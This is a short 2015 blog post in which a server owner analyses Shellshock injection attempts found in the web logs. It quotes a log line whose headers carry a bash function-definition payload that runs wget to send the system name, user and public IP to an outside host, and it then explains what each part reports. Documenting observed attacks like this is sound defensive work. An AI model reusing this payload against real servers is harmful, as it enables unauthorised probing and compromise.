Montag, 11. Mai 2015

"Case study. Please bear with us. Thank you." Injection

Tonight several attempts has hit my system

 46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"

When executing the wget request (without the info) the final file just tells

Case study. Please bear with us. Thank you.
 The Idea behind the several statements is quite simple,
if the injection would work it would report to the page

  • uname - might be Linux
  • whoami - the user which owns/runs the shell
  • and the output of ifconfig.me - what is the IP of the server